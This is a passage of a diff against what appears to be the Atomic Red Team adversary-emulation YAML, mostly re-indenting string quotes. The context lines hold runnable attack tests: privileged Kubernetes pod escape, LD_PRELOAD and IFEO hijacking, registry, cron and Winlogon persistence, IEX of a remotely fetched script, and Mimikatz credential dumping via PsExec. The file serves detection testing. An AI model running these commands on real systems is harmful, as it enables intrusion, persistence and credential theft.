 
-          '
+'
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-          '
+'
         prereq_command: 'which kubectl
 
-          '
+'
       executor:
         command: 'kubectl get cronjobs -n #{namespace}
 
-          '
+'
         name: bash
         elevation_required: false
     - name: CreateCronjob
@@ -11153,7 +11153,7 @@ privilege-escalation:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-        '
+'
       supported_platforms:
       - containers
       input_arguments:
@@ -11164,20 +11164,20 @@ privilege-escalation:
       dependencies:
       - description: 'kubectl must be installed
 
-          '
+'
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-          '
+'
         prereq_command: 'which kubectl
 
-          '
+'
       executor:
         command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
 
-          '
+'
         cleanup_command: 'kubectl delete cronjob art -n #{namespace}
 
-          '
+'
         name: bash
         elevation_required: false
   T1134.002:
@@ -11357,7 +11357,7 @@ privilege-escalation:
         of the referenced file. This technique was used by numerous IoT automated
         exploitation attacks.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -11377,7 +11377,7 @@ privilege-escalation:
           echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
         cleanup_command: 'crontab /tmp/notevil
 
-          '
+'
     - name: Cron - Add script to all cron subfolders
       auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
       description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -11385,7 +11385,7 @@ privilege-escalation:
         schedule. This technique was used by the threat actor Rocke during the exploitation
         of Linux web servers.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -11417,7 +11417,7 @@ privilege-escalation:
         to execute on a schedule. This technique was used by the threat actor Rocke
         during the exploitation of Linux web servers.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -11434,10 +11434,10 @@ privilege-escalation:
         name: bash
         command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
 
-          '
+'
         cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
 
-          '
+'
   T1574.001:
     technique:
       id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
@@ -11612,10 +11612,10 @@ privilege-escalation:
       dependencies:
       - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
 
-          '
+'
         prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -11623,7 +11623,7 @@ privilege-escalation:
         command: "#{gup_executable}\n"
         cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
 
-          '
+'
         name: command_prompt
   T1078.001:
     technique:
@@ -11735,16 +11735,16 @@ privilege-escalation:
       description: 'The Adversaries can activate the default Guest user. The guest
         account is inactivated by default
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'net user guest /active:yes
 
-          '
+'
         cleanup_command: 'net user guest /active:no
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1078.002:
@@ -12185,21 +12185,21 @@ privilege-escalation:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-          '
+'
         prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-          '
+'
       executor:
         command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
 
-          '
+'
         cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Shared Library Injection via LD_PRELOAD
@@ -12224,18 +12224,18 @@ privilege-escalation:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-          '
+'
         prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-          '
+'
       executor:
         command: 'LD_PRELOAD=#{path_to_shared_library} ls
 
-          '
+'
         name: bash
   T1055.001:
     technique:
@@ -12335,10 +12335,10 @@ privilege-escalation:
       dependencies:
       - description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
 
-          '
+'
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
@@ -12484,7 +12484,7 @@ privilege-escalation:
       description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
         daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -12582,24 +12582,24 @@ privilege-escalation:
       - description: Verify docker is installed.
         prereq_command: 'which docker
 
-          '
+'
         get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
           Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
           ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
           echo "Docker installed"; fi
 
-          '
+'
       - description: Verify docker service is running.
         prereq_command: 'sudo systemctl status docker
 
-          '
+'
         get_prereq_command: 'sudo systemctl start docker
 
-          '
+'
       - description: Verify kind is in the path.
         prereq_command: 'which kind
 
-          '
+'
         get_prereq_command: |
           curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
           chmod +x ./kind
@@ -12607,14 +12607,14 @@ privilege-escalation:
       - description: Verify kind-atomic-cluster is created
         prereq_command: 'sudo kind get clusters
 
-          '
+'
         get_prereq_command: 'sudo kind create cluster --name atomic-cluster
 
-          '
+'
       - description: Verify kubectl is in path
         prereq_command: 'which kubectl
 
-          '
+'
         get_prereq_command: |
           curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
           chmod +x ./kubectl
@@ -12625,11 +12625,11 @@ privilege-escalation:
           true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin":
           true,"tty":true,"securityContext":{"privileged":true}}]}}''
 
-          '
+'
         name: sh
         cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
 
-          '
+'
   T1546:
     technique:
       id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db
@@ -13173,7 +13173,7 @@ privilege-escalation:
       auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8
       description: 'Leverage Global Flags Settings
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -13189,19 +13189,19 @@ privilege-escalation:
         command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
           File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
 
-          '
+'
         cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
           NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger
           /f >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: IFEO Global Flags
       auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
       description: 'Leverage Global Flags Settings
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -13337,7 +13337,7 @@ privilege-escalation:
       description: 'This test uses the insmod command to load a kernel module for
         Linux.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -13361,10 +13361,10 @@ privilege-escalation:
       dependencies:
       - description: 'The kernel module must exist on disk at specified location
 
-          '
+'
         prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
 
-          '
+'
         get_prereq_command: |
           if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
           cp #{module_source_path}/* #{temp_folder}/
@@ -13373,7 +13373,7 @@ privilege-escalation:
       executor:
         command: 'sudo insmod #{module_path}
 
-          '
+'
         cleanup_command: |
           sudo rmmod #{module_name}
           [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
@@ -13579,7 +13579,7 @@ privilege-escalation:
       auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900
       description: 'Create a plist and execute it
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -13596,15 +13596,15 @@ privilege-escalation:
       - description: 'The shared library must exist on disk at specified location
           (#{path_malicious_plist})
 
-          '
+'
         prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'echo "The shared library doesn''t exist. Check the path";
           exit 1;
 
-          '
+'
       executor:
         name: bash
         elevation_required: true
@@ -13698,7 +13698,7 @@ privilege-escalation:
       auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
       description: 'Utilize LaunchDaemon to launch `Hello World`
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -13715,15 +13715,15 @@ privilege-escalation:
       - description: 'The shared library must exist on disk at specified location
           (#{path_malicious_plist})
 
-          '
+'
         prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
           try again."; exit 1;
 
-          '
+'
       executor:
         name: bash
         elevation_required: true
@@ -13943,7 +13943,7 @@ privilege-escalation:
       auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
       description: 'Mac logon script
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -14141,7 +14141,7 @@ privilege-escalation:
       description: 'Netsh interacts with other operating system components using dynamic-link
         library (DLL) files
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -14152,7 +14152,7 @@ privilege-escalation:
       executor:
         command: 'netsh.exe add helper #{helper_file}
 
-          '
+'
         name: command_prompt
   T1037.003:
     technique:
@@ -14314,10 +14314,10 @@ privilege-escalation:
       dependencies:
       - description: 'DLL to inject must exist on disk at specified location (#{dll_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
@@ -14358,7 +14358,7 @@ privilege-escalation:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
           ''#{command_line}'' -ParentId #{parent_pid}'
@@ -14387,7 +14387,7 @@ privilege-escalation:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Start-ATHProcessUnderSpecificParent  -ParentId #{parent_pid} -TestGuid
           #{test_guid}'
@@ -14417,7 +14417,7 @@ privilege-escalation:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
           ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
@@ -14453,7 +14453,7 @@ privilege-escalation:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
           -FilePath #{file_path} -CommandLine ''#{command_line}'''
@@ -14863,7 +14863,7 @@ privilege-escalation:
       auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8
       description: 'Modify MacOS plist file in one of two directories
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -14964,10 +14964,10 @@ privilege-escalation:
         command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART"
           /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
 
-          '
+'
         cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1055.002:
@@ -15115,7 +15115,7 @@ privilege-escalation:
         profile pofile that points to a malicious executable. Upon execution, calc.exe
         will be launched.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -15131,13 +15131,13 @@ privilege-escalation:
       dependencies:
       - description: 'Ensure a powershell profile exists for the current user
 
-          '
+'
         prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force
 
-          '
+'
       executor:
         command: |
           Add-Content #{ps_profile} -Value ""
@@ -15484,13 +15484,13 @@ privilege-escalation:
         cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
           Ignore
 
-          '
+'
         name: powershell
     - name: RunPE via VBA
       auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
       description: 'This module executes notepad.exe from within the WINWORD.EXE process
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -15502,7 +15502,7 @@ privilege-escalation:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -15513,7 +15513,7 @@ privilege-escalation:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -15636,7 +15636,7 @@ privilege-escalation:
       dependencies:
       - description: 'The 64-bit version of Microsoft Office must be installed
 
-          '
+'
         prereq_command: |
           try {
             $wdApp = New-Object -COMObject "Word.Application"
@@ -15647,7 +15647,7 @@ privilege-escalation:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -15682,7 +15682,7 @@ privilege-escalation:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-          '
+'
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -15696,10 +15696,10 @@ privilege-escalation:
       - description: 'PsExec tool from Sysinternals must exist on disk at specified
           location (#{psexec_path})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
@@ -15710,7 +15710,7 @@ privilege-escalation:
         command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa
           /inject /id:500" "exit"
 
-          '
+'
         name: command_prompt
         elevation_required: false
   T1055.008:
@@ -15887,14 +15887,14 @@ privilege-escalation:
         command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello
           World"'' >> /etc/rc.common
 
-          '
+'
         elevation_required: true
         name: bash
     - name: rc.common
       auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
       description: 'Modify rc.common
 
-        '
+'
       supported_platforms:
       - linux
       executor:
@@ -15910,12 +15910,12 @@ privilege-escalation:
           ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
           && sudo rm $origfilename;fi
 
-          '
+'
     - name: rc.local
       auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
       description: 'Modify rc.local
 
-        '
+'
       supported_platforms:
       - linux
       executor:
@@ -15931,7 +15931,7 @@ privilege-escalation:
           ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
           sudo rm $origfilename;fi
 
-          '
+'
   T1547.007:
     technique:
       created: '2020-01-24T18:15:06.641Z'
@@ -16013,10 +16013,10 @@ privilege-escalation:
       executor:
         command: 'sudo defaults write com.apple.loginwindow LoginHook #{script}
 
-          '
+'
         cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook
 
-          '
+'
         elevation_required: true
         name: sh
   T1547.001:
@@ -16142,11 +16142,11 @@ privilege-escalation:
         command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
           "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
 
-          '
+'
         cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
           /V "Atomic Red Team" /f >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Reg Key RunOnce
       auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
@@ -16164,11 +16164,11 @@ privilege-escalation:
         command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
           /v 1 /d "#{thing_to_execute}"
 
-          '
+'
         cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
           /v 1 /f >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: PowerShell Registry RunOnce
@@ -16194,7 +16194,7 @@ privilege-escalation:
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Suspicious vbs file run from startup Folder
@@ -16435,7 +16435,7 @@ privilege-escalation:
       description: 'Upon successful execution, cmd.exe will create a scheduled task
         to spawn cmd.exe at 20:10.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -16452,10 +16452,10 @@ privilege-escalation:
         elevation_required: false
         command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
 
-          '
+'
         cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
 
-          '
+'
     - name: Scheduled task Remote
       auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
       description: |
@@ -16491,11 +16491,11 @@ privilege-escalation:
         command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
           "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
 
-          '
+'
         cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
           /TN "Atomic task" /F >nul 2>&1
 
-          '
+'
     - name: Powershell Cmdlet Scheduled Task
       auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
       description: |
@@ -16517,7 +16517,7 @@ privilege-escalation:
         cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
           >$null 2>&1
 
-          '
+'
     - name: Task Scheduler via VBA
       auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
       description: |
@@ -16534,7 +16534,7 @@ privilege-escalation:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -16545,7 +16545,7 @@ privilege-escalation:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -16558,7 +16558,7 @@ privilege-escalation:
         login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
         as Register-ScheduledTask cmdlet behind the scenes.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -16570,7 +16570,7 @@ privilege-escalation:
         cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
           >$null 2>&1
 
-          '
+'
   T1053:
     technique:
       id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
@@ -16706,7 +16706,7 @@ privilege-escalation:
         sets it as the screensaver so it will execute for persistence. Requires a
         reboot and logon.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -16963,7 +16963,7 @@ privilege-escalation:
       description: 'Change Service registry ImagePath of a bengin service to a malicious
         file
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -16983,22 +16983,22 @@ privilege-escalation:
       dependencies:
       - description: 'The service must exist (#{weak_service_name})
 
-          '
+'
         prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
 
-          '
+'
       executor:
         command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
           /f /v ImagePath /d "#{malicious_service_path}"
 
-          '
+'
         cleanup_command: 'sc.exe delete #{weak_service_name}
 
-          '
+'
         name: command_prompt
   T1548.001:
     technique:
@@ -17054,7 +17054,7 @@ privilege-escalation:
       description: 'Make, change owner, and change file attributes on a C source code
         file
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -17080,7 +17080,7 @@ privilege-escalation:
       auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
       description: 'This test sets the SetUID flag on a file in Linux and macOS.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -17096,14 +17096,14 @@ privilege-escalation:
           sudo chmod u+s #{file_to_setuid}
         cleanup_command: 'sudo rm #{file_to_setuid}
 
-          '
+'
         name: sh
         elevation_required: true
     - name: Set a SetGID flag on file
       auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
       description: 'This test sets the SetGID flag on a file in Linux and macOS.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -17119,7 +17119,7 @@ privilege-escalation:
           sudo chmod g+s #{file_to_setuid}
         cleanup_command: 'sudo rm #{file_to_setuid}
 
-          '
+'
         name: sh
         elevation_required: true
   T1547.009:
@@ -17193,7 +17193,7 @@ privilege-escalation:
           #{shortcut_file_path}
         cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Create shortcut to cmd in startup folders
       auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2
@@ -17294,10 +17294,10 @@ privilege-escalation:
       executor:
         command: 'sudo touch /Library/StartupItems/EvilStartup.plist
 
-          '
+'
         cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
 
-          '
+'
         name: sh
         elevation_required: true
   T1548.003:
@@ -17365,7 +17365,7 @@ privilege-escalation:
       auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
       description: 'Common Sudo enumeration methods.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -17379,7 +17379,7 @@ privilege-escalation:
         This is dangerous to modify without using ''visudo'', do not do this on a
         production system.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -17394,7 +17394,7 @@ privilege-escalation:
       description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
         to modify without using ''visudo'', do not do this on a production system.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -17500,7 +17500,7 @@ privilege-escalation:
       description: 'This test creates a Systemd service unit file and enables it as
         a service.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -17573,15 +17573,15 @@ privilege-escalation:
       dependencies:
       - description: 'System must be Ubuntu ,Kali OR CentOS.
 
-          '
+'
         prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
           /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
           ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
 
-          '
+'
         get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
 
-          '
+'
       executor:
         name: bash
         elevation_required: true
@@ -18188,7 +18188,7 @@ privilege-escalation:
       auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f
       description: 'Adds a command to the .bash_profile file of the current user
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -18200,13 +18200,13 @@ privilege-escalation:
       executor:
         command: 'echo "#{command_to_add}" >> ~/.bash_profile
 
-          '
+'
         name: sh
     - name: Add command to .bashrc
       auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
       description: 'Adds a command to the .bashrc file of the current user
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -18218,7 +18218,7 @@ privilege-escalation:
       executor:
         command: 'echo "#{command_to_add}" >> ~/.bashrc
 
-          '
+'
         name: sh
   T1055.014:
     technique:
@@ -18653,10 +18653,10 @@ privilege-escalation:
       dependencies:
       - description: 'Service binary must exist on disk at specified location (#{binary_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -18689,10 +18689,10 @@ privilege-escalation:
       dependencies:
       - description: 'Service binary must exist on disk at specified location (#{binary_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -18788,11 +18788,11 @@ privilege-escalation:
         command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
           "Shell" "explorer.exe, #{binary_to_execute}" -Force
 
-          '
+'
         cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
           NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Winlogon Userinit Key Persistence - PowerShell
       auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
@@ -18811,11 +18811,11 @@ privilege-escalation:
         command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
           "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
 
-          '
+'
         cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
           NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Winlogon Notify Key Logon Persistence - PowerShell
       auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9
@@ -18837,7 +18837,7 @@ privilege-escalation:
         cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
           -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
   T1547.013:
     technique:
@@ -19331,10 +19331,10 @@ defense-evasion:
         command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
           #{local_file}
 
-          '
+'
         cleanup_command: 'del #{local_file} >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Bitsadmin Download (PowerShell)
       auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
@@ -19358,10 +19358,10 @@ defense-evasion:
         command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
           #{local_file}
 
-          '
+'
         cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Persist, Download, & Execute
       auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
@@ -19399,7 +19399,7 @@ defense-evasion:
           bitsadmin.exe /complete #{bits_job_name}
         cleanup_command: 'del #{local_file} >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Bits download using desktopimgdownldr.exe (cmd)
       auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
@@ -19431,10 +19431,10 @@ defense-evasion:
         command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
           /eventName:desktopimgdownldr
 
-          '
+'
         cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1
 
-          '
+'
         name: command_prompt
   T1027.001:
     technique:
@@ -19524,20 +19524,20 @@ defense-evasion:
       dependencies:
       - description: 'The binary must exist on disk at specified location (#{file_to_pad})
 
-          '
+'
         prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
 
-          '
+'
         get_prereq_command: 'cp /bin/ls #{file_to_pad}
 
-          '
+'
       executor:
         command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
 
-          '
+'
         cleanup_command: 'rm #{file_to_pad}
 
-          '
+'
         name: sh
   T1542.003:
     technique:
@@ -19770,7 +19770,7 @@ defense-evasion:
           cmd.exe /c eventvwr.msc
